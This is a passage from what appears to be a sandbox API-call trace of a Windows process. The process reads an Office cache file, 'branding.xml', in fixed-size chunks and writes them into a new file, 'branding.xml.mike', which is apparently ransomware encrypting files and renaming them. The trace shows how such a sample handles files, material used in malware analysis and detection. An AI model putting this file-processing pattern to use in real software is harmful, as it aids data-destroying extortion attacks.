[0041.078] SetFilePointer (in: hFile=0x264, lDistanceToMove=215040, lpDistanceToMoveHigh=0x2af104*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x2af104*=0) returned 0x34800 [0041.078] ReadFile (in: hFile=0x264, lpBuffer=0x20f6ab4, nNumberOfBytesToRead=0x2800, lpNumberOfBytesRead=0x2af110, lpOverlapped=0x0 | out: lpBuffer=0x20f6ab4*, lpNumberOfBytesRead=0x2af110*=0x2800, lpOverlapped=0x0) returned 1 [0041.079] CloseHandle (hObject=0x264) returned 1 [0041.080] GetFullPathNameW (in: lpFileName="C:\\MSOCache\\All Users\\{90140000-0115-0409-1000-0000000FF1CE}-C\\branding.xml.mike", nBufferLength=0x105, lpBuffer=0x2aeb90, lpFilePart=0x0 | out: lpBuffer="C:\\MSOCache\\All Users\\{90140000-0115-0409-1000-0000000FF1CE}-C\\branding.xml.mike", lpFilePart=0x0) returned 0x50 [0041.080] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x2af084) returned 1 [0041.080] CreateFileW (lpFileName="C:\\MSOCache\\All Users\\{90140000-0115-0409-1000-0000000FF1CE}-C\\branding.xml.mike" (normalized: "c:\\msocache\\all users\\{90140000-0115-0409-1000-0000000ff1ce}-c\\branding.xml.mike"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x4, dwFlagsAndAttributes=0x100000, hTemplateFile=0x0) returned 0x264 [0041.080] GetFileType (hFile=0x264) returned 0x1 [0041.080] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x2af080) returned 1 [0041.080] GetFileType (hFile=0x264) returned 0x1 [0041.080] SetFilePointer (in: hFile=0x264, lDistanceToMove=0, lpDistanceToMoveHigh=0x2af058*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x2af058*=0) returned 0x34a20 [0041.080] WriteFile (in: hFile=0x264, lpBuffer=0x210101c*, nNumberOfBytesToWrite=0x2800, lpNumberOfBytesWritten=0x2af124, lpOverlapped=0x0 | out: lpBuffer=0x210101c*, lpNumberOfBytesWritten=0x2af124*=0x2800, lpOverlapped=0x0) returned 1 [0041.081] CloseHandle (hObject=0x264) returned 1 [0041.082] GetFullPathNameW (in: lpFileName="C:\\MSOCache\\All Users\\{90140000-0115-0409-1000-0000000FF1CE}-C\\branding.xml", nBufferLength=0x105, lpBuffer=0x2aeb80, lpFilePart=0x0 | out: lpBuffer="C:\\MSOCache\\All Users\\{90140000-0115-0409-1000-0000000FF1CE}-C\\branding.xml", lpFilePart=0x0) returned 0x4b [0041.082] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x2af074) returned 1 [0041.082] CreateFileW (lpFileName="C:\\MSOCache\\All Users\\{90140000-0115-0409-1000-0000000FF1CE}-C\\branding.xml" (normalized: "c:\\msocache\\all users\\{90140000-0115-0409-1000-0000000ff1ce}-c\\branding.xml"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x100000, hTemplateFile=0x0) returned 0x264 [0041.083] GetFileType (hFile=0x264) returned 0x1 [0041.083] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x2af070) returned 1 [0041.083] GetFileType (hFile=0x264) returned 0x1 [0041.083] SetFilePointer (in: hFile=0x264, lDistanceToMove=225280, lpDistanceToMoveHigh=0x2af104*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x2af104*=0) returned 0x37000 [0041.083] ReadFile (in: hFile=0x264, lpBuffer=0x2103a8c, nNumberOfBytesToRead=0x2800, lpNumberOfBytesRead=0x2af110, lpOverlapped=0x0 | out: lpBuffer=0x2103a8c*, lpNumberOfBytesRead=0x2af110*=0x2800, lpOverlapped=0x0) returned 1 [0041.086] CloseHandle (hObject=0x264) returned 1 [0041.087] GetFullPathNameW (in: lpFileName="C:\\MSOCache\\All Users\\{90140000-0115-0409-1000-0000000FF1CE}-C\\branding.xml.mike", nBufferLength=0x105, lpBuffer=0x2aeb90, lpFilePart=0x0 | out: lpBuffer="C:\\MSOCache\\All Users\\{90140000-0115-0409-1000-0000000FF1CE}-C\\branding.xml.mike", lpFilePart=0x0) returned 0x50 [0041.087] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x2af084) returned 1 [0041.087] CreateFileW (lpFileName="C:\\MSOCache\\All Users\\{90140000-0115-0409-1000-0000000FF1CE}-C\\branding.xml.mike" (normalized: "c:\\msocache\\all users\\{90140000-0115-0409-1000-0000000ff1ce}-c\\branding.xml.mike"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x4, dwFlagsAndAttributes=0x100000, hTemplateFile=0x0) returned 0x264 [0041.087] GetFileType (hFile=0x264) returned 0x1 [0041.087] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x2af080) returned 1 [0041.087] GetFileType (hFile=0x264) returned 0x1 [0041.087] SetFilePointer (in: hFile=0x264, lDistanceToMove=0, lpDistanceToMoveHigh=0x2af058*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x2af058*=0) returned 0x37220 [0041.087] WriteFile (in: hFile=0x264, lpBuffer=0x210dff4*, nNumberOfBytesToWrite=0x2800, lpNumberOfBytesWritten=0x2af124, lpOverlapped=0x0 | out: lpBuffer=0x210dff4*, lpNumberOfBytesWritten=0x2af124*=0x2800, lpOverlapped=0x0) returned 1 [0041.087] CloseHandle (hObject=0x264) returned 1 [0041.089] GetFullPathNameW (in: lpFileName="C:\\MSOCache\\All Users\\{90140000-0115-0409-1000-0000000FF1CE}-C\\branding.xml", nBufferLength=0x105, lpBuffer=0x2aeb80, lpFilePart=0x0 | out: lpBuffer="C:\\MSOCache\\All Users\\{90140000-0115-0409-1000-0000000FF1CE}-C\\branding.xml", lpFilePart=0x0) returned 0x4b [0041.089] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x2af074) returned 1 [0041.089] CreateFileW (lpFileName="C:\\MSOCache\\All Users\\{90140000-0115-0409-1000-0000000FF1CE}-C\\branding.xml" (normalized: "c:\\msocache\\all users\\{90140000-0115-0409-1000-0000000ff1ce}-c\\branding.xml"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x100000, hTemplateFile=0x0) returned 0x264 [0041.089] GetFileType (hFile=0x264) returned 0x1 [0041.089] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x2af070) returned 1 [0041.090] GetFileType (hFile=0x264) returned 0x1 [0041.090] SetFilePointer (in: hFile=0x264, lDistanceToMove=235520, lpDistanceToMoveHigh=0x2af104*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x2af104*=0) returned 0x39800 [0041.090] ReadFile (in: hFile=0x264, lpBuffer=0x2110a64, nNumberOfBytesToRead=0x2800, lpNumberOfBytesRead=0x2af110, lpOverlapped=0x0 | out: lpBuffer=0x2110a64*, lpNumberOfBytesRead=0x2af110*=0x2800, lpOverlapped=0x0) returned 1 [0041.095] CloseHandle (hObject=0x264) returned 1 [0041.096] GetFullPathNameW (in: lpFileName="C:\\MSOCache\\All Users\\{90140000-0115-0409-1000-0000000FF1CE}-C\\branding.xml.mike", nBufferLength=0x105, lpBuffer=0x2aeb90, lpFilePart=0x0 | out: lpBuffer="C:\\MSOCache\\All Users\\{90140000-0115-0409-1000-0000000FF1CE}-C\\branding.xml.mike", lpFilePart=0x0) returned 0x50 [0041.096] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x2af084) returned 1 [0041.096] CreateFileW (lpFileName="C:\\MSOCache\\All Users\\{90140000-0115-0409-1000-0000000FF1CE}-C\\branding.xml.mike" (normalized: "c:\\msocache\\all users\\{90140000-0115-0409-1000-0000000ff1ce}-c\\branding.xml.mike"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x4, dwFlagsAndAttributes=0x100000, hTemplateFile=0x0) returned 0x264 [0041.096] GetFileType (hFile=0x264) returned 0x1 [0041.096] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x2af080) returned 1 [0041.096] GetFileType (hFile=0x264) returned 0x1 [0041.096] SetFilePointer (in: hFile=0x264, lDistanceToMove=0, lpDistanceToMoveHigh=0x2af058*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x2af058*=0) returned 0x39a20 [0041.096] WriteFile (in: hFile=0x264, lpBuffer=0x211afcc*, nNumberOfBytesToWrite=0x2800, lpNumberOfBytesWritten=0x2af124, lpOverlapped=0x0 | out: lpBuffer=0x211afcc*, lpNumberOfBytesWritten=0x2af124*=0x2800, lpOverlapped=0x0) returned 1 [0041.097] CloseHandle (hObject=0x264) returned 1 [0041.099] GetFullPathNameW (in: lpFileName="C:\\MSOCache\\All Users\\{90140000-0115-0409-1000-0000000FF1CE}-C\\branding.xml", nBufferLength=0x105, lpBuffer=0x2aeb80, lpFilePart=0x0 | out: lpBuffer="C:\\MSOCache\\All Users\\{90140000-0115-0409-1000-0000000FF1CE}-C\\branding.xml", lpFilePart=0x0) returned 0x4b [0041.099] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x2af074) returned 1 [0041.099] CreateFileW (lpFileName="C:\\MSOCache\\All Users\\{90140000-0115-0409-1000-0000000FF1CE}-C\\branding.xml" (normalized: "c:\\msocache\\all users\\{90140000-0115-0409-1000-0000000ff1ce}-c\\branding.xml"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x100000, hTemplateFile=0x0) returned 0x264 [0041.099] GetFileType (hFile=0x264) returned 0x1 [0041.099] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x2af070) returned 1 [0041.099] GetFileType (hFile=0x264) returned 0x1 [0041.099] SetFilePointer (in: hFile=0x264, lDistanceToMove=245760, lpDistanceToMoveHigh=0x2af104*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x2af104*=0) returned 0x3c000 [0041.099] ReadFile (in: hFile=0x264, lpBuffer=0x211da3c, nNumberOfBytesToRead=0x2800, lpNumberOfBytesRead=0x2af110, lpOverlapped=0x0 | out: lpBuffer=0x211da3c*, lpNumberOfBytesRead=0x2af110*=0x2800, lpOverlapped=0x0) returned 1 [0041.100] CloseHandle (hObject=0x264) returned 1 [0041.101] GetFullPathNameW (in: lpFileName="C:\\MSOCache\\All Users\\{90140000-0115-0409-1000-0000000FF1CE}-C\\branding.xml.mike", nBufferLength=0x105, lpBuffer=0x2aeb90, lpFilePart=0x0 | out: lpBuffer="C:\\MSOCache\\All Users\\{90140000-0115-0409-1000-0000000FF1CE}-C\\branding.xml.mike", lpFilePart=0x0) returned 0x50 [0041.101] CreateFileW (lpFileName="C:\\MSOCache\\All Users\\{90140000-0115-0409-1000-0000000FF1CE}-C\\branding.xml.mike" (normalized: "c:\\msocache\\all users\\{90140000-0115-0409-1000-0000000ff1ce}-c\\branding.xml.mike"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x4, dwFlagsAndAttributes=0x100000, hTemplateFile=0x0) returned 0x264 [0041.101] GetFileType (hFile=0x264) returned 0x1 [0041.101] GetFileType (hFile=0x264) returned 0x1 [0041.101] SetFilePointer (in: hFile=0x264, lDistanceToMove=0, lpDistanceToMoveHigh=0x2af058*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x2af058*=0) returned 0x3c220 [0041.101] WriteFile (in: hFile=0x264, lpBuffer=0x2127fa4*, nNumberOfBytesToWrite=0x2800, lpNumberOfBytesWritten=0x2af124, lpOverlapped=0x0 | out: lpBuffer=0x2127fa4*, lpNumberOfBytesWritten=0x2af124*=0x2800, lpOverlapped=0x0) returned 1 [0041.101] CloseHandle (hObject=0x264) returned 1 [0041.103] GetFullPathNameW (in: lpFileName="C:\\MSOCache\\All Users\\{90140000-0115-0409-1000-0000000FF1CE}-C\\branding.xml", nBufferLength=0x105, lpBuffer=0x2aeb80, lpFilePart=0x0 | out: lpBuffer="C:\\MSOCache\\All Users\\{90140000-0115-0409-1000-0000000FF1CE}-C\\branding.xml", lpFilePart=0x0) returned 0x4b [0041.103] CreateFileW (lpFileName="C:\\MSOCache\\All Users\\{90140000-0115-0409-1000-0000000FF1CE}-C\\branding.xml" (normalized: "c:\\msocache\\all users\\{90140000-0115-0409-1000-0000000ff1ce}-c\\branding.xml"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x100000, hTemplateFile=0x0) returned 0x264 [0041.103] GetFileType (hFile=0x264) returned 0x1 [0041.103] SetFilePointer (in: hFile=0x264, lDistanceToMove=256000, lpDistanceToMoveHigh=0x2af104*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x2af104*=0) returned 0x3e800 [0041.104] ReadFile (in: hFile=0x264, lpBuffer=0x212aa14, nNumberOfBytesToRead=0x2800, lpNumberOfBytesRead=0x2af110, lpOverlapped=0x0 | out: lpBuffer=0x212aa14*, lpNumberOfBytesRead=0x2af110*=0x2800, lpOverlapped=0x0) returned 1 [0041.105] CloseHandle (hObject=0x264) returned 1 [0041.105] GetFullPathNameW (in: lpFileName="C:\\MSOCache\\All Users\\{90140000-0115-0409-1000-0000000FF1CE}-C\\branding.xml.mike", nBufferLength=0x105, lpBuffer=0x2aeb90, lpFilePart=0x0 | out: lpBuffer="C:\\MSOCache\\All Users\\{90140000-0115-0409-1000-0000000FF1CE}-C\\branding.xml.mike", lpFilePart=0x0) returned 0x50 [0041.106] SetFilePointer (in: hFile=0x264, lDistanceToMove=266240, lpDistanceToMoveHigh=0x2af104*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x2af104*=0) returned 0x41000 [0041.106] ReadFile (in: hFile=0x264, lpBuffer=0x21379ec, nNumberOfBytesToRead=0x2800, lpNumberOfBytesRead=0x2af110, lpOverlapped=0x0 | out: lpBuffer=0x21379ec*, lpNumberOfBytesRead=0x2af110*=0x2800, lpOverlapped=0x0) returned 1 [0041.107] CloseHandle (hObject=0x264) returned 1 [0041.108] GetFullPathNameW (in: lpFileName="C:\\MSOCache\\All Users\\{90140000-0115-0409-1000-0000000FF1CE}-C\\branding.xml.mike", nBufferLength=0x105, lpBuffer=0x2aeb90, lpFilePart=0x0 | out: lpBuffer="C:\\MSOCache\\All Users\\{90140000-0115-0409-1000-0000000FF1CE}-C\\branding.xml.mike", lpFilePart=0x0) returned 0x50 [0041.108] SetFilePointer (in: hFile=0x264, lDistanceToMove=276480, lpDistanceToMoveHigh=0x2af104*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x2af104*=0) returned 0x43800 [0041.108] ReadFile (in: hFile=0x264, lpBuffer=0x21449c4, nNumberOfBytesToRead=0x2800, lpNumberOfBytesRead=0x2af110, lpOverlapped=0x0 | out: lpBuffer=0x21449c4*, lpNumberOfBytesRead=0x2af110*=0x2800, lpOverlapped=0x0) returned 1 [0041.109] CloseHandle (hObject=0x264) returned 1 [0041.109] GetFullPathNameW (in: lpFileName="C:\\MSOCache\\All Users\\{90140000-0115-0409-1000-0000000FF1CE}-C\\branding.xml.mike", nBufferLength=0x105, lpBuffer=0x2aeb90, lpFilePart=0x0 | out: lpBuffer="C:\\MSOCache\\All Users\\{90140000-0115-0409-1000-0000000FF1CE}-C\\branding.xml.mike", lpFilePart=0x0) returned 0x50 [0041.110] SetFilePointer (in: hFile=0x264, lDistanceToMove=286720, lpDistanceToMoveHigh=0x2af104*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x2af104*=0) returned 0x46000 [0041.110] ReadFile (in: hFile=0x264, lpBuffer=0x215199c, nNumberOfBytesToRead=0x2800, lpNumberOfBytesRead=0x2af110, lpOverlapped=0x0 | out: lpBuffer=0x215199c*, lpNumberOfBytesRead=0x2af110*=0x2800, lpOverlapped=0x0) returned 1 [0041.110] CloseHandle (hObject=0x264) returned 1 [0041.111] GetFullPathNameW (in: lpFileName="C:\\MSOCache\\All Users\\{90140000-0115-0409-1000-0000000FF1CE}-C\\branding.xml.mike", nBufferLength=0x105, lpBuffer=0x2aeb90, lpFilePart=0x0 | out: lpBuffer="C:\\MSOCache\\All Users\\{90140000-0115-0409-1000-0000000FF1CE}-C\\branding.xml.mike", lpFilePart=0x0) returned 0x50 [0041.111] SetFilePointer (in: hFile=0x264, lDistanceToMove=296960, lpDistanceToMoveHigh=0x2af104*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x2af104*=0) returned 0x48800 [0041.112] ReadFile (in: hFile=0x264, lpBuffer=0x215e974, nNumberOfBytesToRead=0x2800, lpNumberOfBytesRead=0x2af110, lpOverlapped=0x0 | out: lpBuffer=0x215e974*, lpNumberOfBytesRead=0x2af110*=0x2800, lpOverlapped=0x0) returned 1 [0041.112] CloseHandle (hObject=0x264) returned 1 [0041.113] GetFullPathNameW (in: lpFileName="C:\\MSOCache\\All Users\\{90140000-0115-0409-1000-0000000FF1CE}-C\\branding.xml.mike", nBufferLength=0x105, lpBuffer=0x2aeb90, lpFilePart=0x0 | out: lpBuffer="C:\\MSOCache\\All Users\\{90140000-0115-0409-1000-0000000FF1CE}-C\\branding.xml.mike", lpFilePart=0x0) returned 0x50 [0041.114] GetFullPathNameW (in: lpFileName="C:\\MSOCache\\All Users\\{90140000-0115-0409-1000-0000000FF1CE}-C\\branding.xml.mike", nBufferLength=0x105, lpBuffer=0x2aeb90, lpFilePart=0x0 | out: lpBuffer="C:\\MSOCache\\All Users\\{90140000-0115-0409-1000-0000000FF1CE}-C\\branding.xml.mike", lpFilePart=0x0) returned 0x50 [0041.115] GetFullPathNameW (in: lpFileName="C:\\MSOCache\\All Users\\{90140000-0115-0409-1000-0000000FF1CE}-C\\branding.xml.mike", nBufferLength=0x105, lpBuffer=0x2aeb90, lpFilePart=0x0 | out: lpBuffer="C:\\MSOCache\\All Users\\{90140000-0115-0409-1000-0000000FF1CE}-C\\branding.xml.mike", lpFilePart=0x0) returned 0x50 [0041.118] GetFullPathNameW (in: lpFileName="C:\\MSOCache\\All Users\\{90140000-0115-0409-1000-0000000FF1CE}-C\\branding.xml.mike", nBufferLength=0x105, lpBuffer=0x2aeb90, lpFilePart=0x0 | out: lpBuffer="C:\\MSOCache\\All Users\\{90140000-0115-0409-1000-0000000FF1CE}-C\\branding.xml.mike", lpFilePart=0x0) returned 0x50 [0041.119] GetFullPathNameW (in: lpFileName="C:\\MSOCache\\All Users\\{90140000-0115-0409-1000-0000000FF1CE}-C\\branding.xml.mike", nBufferLength=0x105, lpBuffer=0x2aeb90, lpFilePart=0x0 | out: lpBuffer="C:\\MSOCache\\All Users\\{90140000-0115-0409-1000-0000000FF1CE}-C\\branding.xml.mike", lpFilePart=0x0) returned 0x50 [0041.121] GetFullPathNameW (in: lpFileName="C:\\MSOCache\\All Users\\{90140000-0115-0409-1000-0000000FF1CE}-C\\branding.xml.mike", nBufferLength=0x105, lpBuffer=0x2aeb90, lpFilePart=0x0 | out: lpBuffer="C:\\MSOCache\\All Users\\{90140000-0115-0409-1000-0000000FF1CE}-C\\branding.xml.mike", lpFilePart=0x0) returned 0x50 [0041.122] GetFullPathNameW (in: lpFileName="C:\\MSOCache\\All Users\\{90140000-0115-0409-1000-0000000FF1CE}-C\\branding.xml.mike", nBufferLength=0x105, lpBuffer=0x2aeb90, lpFilePart=0x0 | out: lpBuffer="C:\\MSOCache\\All Users\\{90140000-0115-0409-1000-0000000FF1CE}-C\\branding.xml.mike", lpFilePart=0x0) returned 0x50 [0041.123] GetFullPathNameW (in: lpFileName="C:\\MSOCache\\All Users\\{90140000-0115-0409-1000-0000000FF1CE}-C\\branding.xml.mike", nBufferLength=0x105, lpBuffer=0x2aeb90, lpFilePart=0x0 | out: lpBuffer="C:\\MSOCache\\All Users\\{90140000-0115-0409-1000-0000000FF1CE}-C\\branding.xml.mike", lpFilePart=0x0) returned 0x50 [0041.125] GetFullPathNameW (in: lpFileName="C:\\MSOCache\\All Users\\{90140000-0115-0409-1000-0000000FF1CE}-C\\branding.xml.mike", nBufferLength=0x105, lpBuffer=0x2aeb90, lpFilePart=0x0 | out: lpBuffer="C:\\MSOCache\\All Users\\{90140000-0115-0409-1000-0000000FF1CE}-C\\branding.xml.mike", lpFilePart=0x0) returned 0x50 [0041.126] GetFullPathNameW (in: lpFileName="C:\\MSOCache\\All Users\\{90140000-0115-0409-1000-0000000FF1CE}-C\\branding.xml.mike", nBufferLength=0x105, lpBuffer=0x2aeb90, lpFilePart=0x0 | out: lpBuffer="C:\\MSOCache\\All Users\\{90140000-0115-0409-1000-0000000FF1CE}-C\\branding.xml.mike", lpFilePart=0x0) returned 0x50 [0041.128] GetFullPathNameW (in: lpFileName="C:\\MSOCache\\All Users\\{90140000-0115-0409-1000-0000000FF1CE}-C\\branding.xml.mike", nBufferLength=0x105, lpBuffer=0x2aeb90, lpFilePart=0x0 | out: lpBuffer="C:\\MSOCache\\All Users\\{90140000-0115-0409-1000-0000000FF1CE}-C\\branding.xml.mike", lpFilePart=0x0) returned 0x50 [0041.129] GetFullPathNameW (in: lpFileName="C:\\MSOCache\\All Users\\{90140000-0115-0409-1000-0000000FF1CE}-C\\branding.xml.mike", nBufferLength=0x105, lpBuffer=0x2aeb90, lpFilePart=0x0 | out: lpBuffer="C:\\MSOCache\\All Users\\{90140000-0115-0409-1000-0000000FF1CE}-C\\branding.xml.mike", lpFilePart=0x0) returned 0x50 [0041.130] GetFullPathNameW (in: lpFileName="C:\\MSOCache\\All Users\\{90140000-0115-0409-1000-0000000FF1CE}-C\\branding.xml.mike", nBufferLength=0x105, lpBuffer=0x2aeb90, lpFilePart=0x0 | out: lpBuffer="C:\\MSOCache\\All Users\\{90140000-0115-0409-1000-0000000FF1CE}-C\\branding.xml.mike", lpFilePart=0x0) returned 0x50 [0041.146] GetFullPathNameW (in: lpFileName="C:\\MSOCache\\All Users\\{90140000-0115-0409-1000-0000000FF1CE}-C\\branding.xml.mike", nBufferLength=0x105, lpBuffer=0x2aeb90, lpFilePart=0x0 | out: lpBuffer="C:\\MSOCache\\All Users\\{90140000-0115-0409-1000-0000000FF1CE}-C\\branding.xml.mike", lpFilePart=0x0) returned 0x50 [0041.148] GetFullPathNameW (in: lpFileName="C:\\MSOCache\\All Users\\{90140000-0115-0409-1000-0000000FF1CE}-C\\branding.xml.mike", nBufferLength=0x105, lpBuffer=0x2aeb90, lpFilePart=0x0 | out: lpBuffer="C:\\MSOCache\\All Users\\{90140000-0115-0409-1000-0000000FF1CE}-C\\branding.xml.mike", lpFilePart=0x0) returned 0x50 [0041.153] GetFullPathNameW (in: lpFileName="C:\\MSOCache\\All Users\\{90140000-0115-0409-1000-0000000FF1CE}-C\\branding.xml.mike", nBufferLength=0x105, lpBuffer=0x2aeb90, lpFilePart=0x0 | out: lpBuffer="C:\\MSOCache\\All Users\\{90140000-0115-0409-1000-0000000FF1CE}-C\\branding.xml.mike", lpFilePart=0x0) returned 0x50 [0041.154] GetFullPathNameW (in: lpFileName="C:\\MSOCache\\All Users\\{90140000-0115-0409-1000-0000000FF1CE}-C\\branding.xml.mike", nBufferLength=0x105, lpBuffer=0x2aeb90, lpFilePart=0x0 | out: lpBuffer="C:\\MSOCache\\All Users\\{90140000-0115-0409-1000-0000000FF1CE}-C\\branding.xml.mike", lpFilePart=0x0) returned 0x50 [0041.156] GetFullPathNameW (in: lpFileName="C:\\MSOCache\\All Users\\{90140000-0115-0409-1000-0000000FF1CE}-C\\branding.xml.mike", nBufferLength=0x105, lpBuffer=0x2aeb90, lpFilePart=0x0 | out: lpBuffer="C:\\MSOCache\\All Users\\{90140000-0115-0409-1000-0000000FF1CE}-C\\branding.xml.mike", lpFilePart=0x0) returned 0x50 [0041.157] GetFullPathNameW (in: lpFileName="C:\\MSOCache\\All Users\\{90140000-0115-0409-1000-0000000FF1CE}-C\\branding.xml.mike", nBufferLength=0x105, lpBuffer=0x2aeb90, lpFilePart=0x0 | out: lpBuffer="C:\\MSOCache\\All Users\\{90140000-0115-0409-1000-0000000FF1CE}-C\\branding.xml.mike", lpFilePart=0x0) returned 0x50 [0041.158] GetFullPathNameW (in: lpFileName="C:\\MSOCache\\All Users\\{90140000-0115-0409-1000-0000000FF1CE}-C\\branding.xml.mike", nBufferLength=0x105, lpBuffer=0x2aeb90, lpFilePart=0x0 | out: lpBuffer="C:\\MSOCache\\All Users\\{90140000-0115-0409-1000-0000000FF1CE}-C\\branding.xml.mike", lpFilePart=0x0) returned 0x50 [0041.160] GetFullPathNameW (in: lpFileName="C:\\MSOCache\\All Users\\{90140000-0115-0409-1000-0000000FF1CE}-C\\branding.xml.mike", nBufferLength=0x105, lpBuffer=0x2aeb90, lpFilePart=0x0 | out: lpBuffer="C:\\MSOCache\\All Users\\{90140000-0115-0409-1000-0000000FF1CE}-C\\branding.xml.mike", lpFilePart=0x0) returned 0x50 [0041.162] GetFullPathNameW (in: lpFileName="C:\\MSOCache\\All Users\\{90140000-0115-0409-1000-0000000FF1CE}-C\\branding.xml.mike", nBufferLength=0x105, lpBuffer=0x2aeb90, lpFilePart=0x0 | out: lpBuffer="C:\\MSOCache\\All Users\\{90140000-0115-0409-1000-0000000FF1CE}-C\\branding.xml.mike", lpFilePart=0x0) returned 0x50 [0041.164] GetFullPathNameW (in: lpFileName="C:\\MSOCache\\All Users\\{90140000-0115-0409-1000-0000000FF1CE}-C\\branding.xml.mike", nBufferLength=0x105, lpBuffer=0x2aeb90, lpFilePart=0x0 | out: lpBuffer="C:\\MSOCache\\All Users\\{90140000-0115-0409-1000-0000000FF1CE}-C\\branding.xml.mike", lpFilePart=0x0) returned 0x50 [0041.165] GetFullPathNameW (in: lpFileName="C:\\MSOCache\\All Users\\{90140000-0115-0409-1000-0000000FF1CE}-C\\branding.xml.mike", nBufferLength=0x105, lpBuffer=0x2aeb90, lpFilePart=0x0 | out: lpBuffer="C:\\MSOCache\\All Users\\{90140000-0115-0409-1000-0000000FF1CE}-C\\branding.xml.mike", lpFilePart=0x0) returned 0x50 [0041.166] GetFullPathNameW (in: lpFileName="C:\\MSOCache\\All Users\\{90140000-0115-0409-1000-0000000FF1CE}-C\\branding.xml.mike", nBufferLength=0x105, lpBuffer=0x2aeb90, lpFilePart=0x0 | out: lpBuffer="C:\\MSOCache\\All Users\\{90140000-0115-0409-1000-0000000FF1CE}-C\\branding.xml.mike", lpFilePart=0x0) returned 0x50 [0041.168] GetFullPathNameW (in: lpFileName="C:\\MSOCache\\All Users\\{90140000-0115-0409-1000-0000000FF1CE}-C\\branding.xml.mike", nBufferLength=0x105, lpBuffer=0x2aeb90, lpFilePart=0x0 | out: lpBuffer="C:\\MSOCache\\All Users\\{90140000-0115-0409-1000-0000000FF1CE}-C\\branding.xml.mike", lpFilePart=0x0) returned 0x50 [0041.169] GetFullPathNameW (in: lpFileName="C:\\MSOCache\\All Users\\{90140000-0115-0409-1000-0000000FF1CE}-C\\branding.xml.mike", nBufferLength=0x105, lpBuffer=0x2aeb90, lpFilePart=0x0 | out: lpBuffer="C:\\MSOCache\\All Users\\{90140000-0115-0409-1000-0000000FF1CE}-C\\branding.xml.mike", lpFilePart=0x0) returned 0x50 [0041.170] GetFullPathNameW (in: lpFileName="C:\\MSOCache\\All Users\\{90140000-0115-0409-1000-0000000FF1CE}-C\\branding.xml.mike", nBufferLength=0x105, lpBuffer=0x2aeb90, lpFilePart=0x0 | out: lpBuffer="C:\\MSOCache\\All Users\\{90140000-0115-0409-1000-0000000FF1CE}-C\\branding.xml.mike", lpFilePart=0x0) returned 0x50 [0041.170] WriteFile (in: hFile=0x264, lpBuffer=0x22ddc88*, nNumberOfBytesToWrite=0x980, lpNumberOfBytesWritten=0x2af104, lpOverlapped=0x0 | out: lpBuffer=0x22ddc88*, lpNumberOfBytesWritten=0x2af104*=0x980, lpOverlapped=0x0) returned 1 [0041.176] CloseHandle (hObject=0x264) returned 1 [0041.182] GetFullPathNameW (in: lpFileName="C:\\MSOCache\\All Users\\{90140000-0115-0409-1000-0000000FF1CE}-C\\branding.xml.mike", nBufferLength=0x105, lpBuffer=0x2aeb98, lpFilePart=0x0 | out: lpBuffer="C:\\MSOCache\\All Users\\{90140000-0115-0409-1000-0000000FF1CE}-C\\branding.xml.mike", lpFilePart=0x0) returned 0x50 [0041.183] WriteFile (in: hFile=0x264, lpBuffer=0x22e0ebc*, nNumberOfBytesToWrite=0x20c, lpNumberOfBytesWritten=0x2af134, lpOverlapped=0x0 | out: lpBuffer=0x22e0ebc*, lpNumberOfBytesWritten=0x2af134*=0x20c, lpOverlapped=0x0) returned 1 [0041.183] CloseHandle (hObject=0x264) returned 1 [0041.186] GetFullPathNameW (in: lpFileName="C:\\MSOCache\\All Users\\{90140000-0115-0409-1000-0000000FF1CE}-C\\branding.xml", nBufferLength=0x105, lpBuffer=0x2aecfc, lpFilePart=0x0 | out: lpBuffer="C:\\MSOCache\\All Users\\{90140000-0115-0409-1000-0000000FF1CE}-C\\branding.xml", lpFilePart=0x0) returned 0x4b [0041.186] GetFullPathNameW (in: lpFileName="C:\\MSOCache\\All Users\\{90140000-0115-0409-1000-0000000FF1CE}-C\\branding.xml.mike", nBufferLength=0x105, lpBuffer=0x2aed20, lpFilePart=0x0 | out: lpBuffer="C:\\MSOCache\\All Users\\{90140000-0115-0409-1000-0000000FF1CE}-C\\branding.xml.mike", lpFilePart=0x0) returned 0x50 [0041.186] GetFullPathNameW (in: lpFileName="C:\\MSOCache\\All 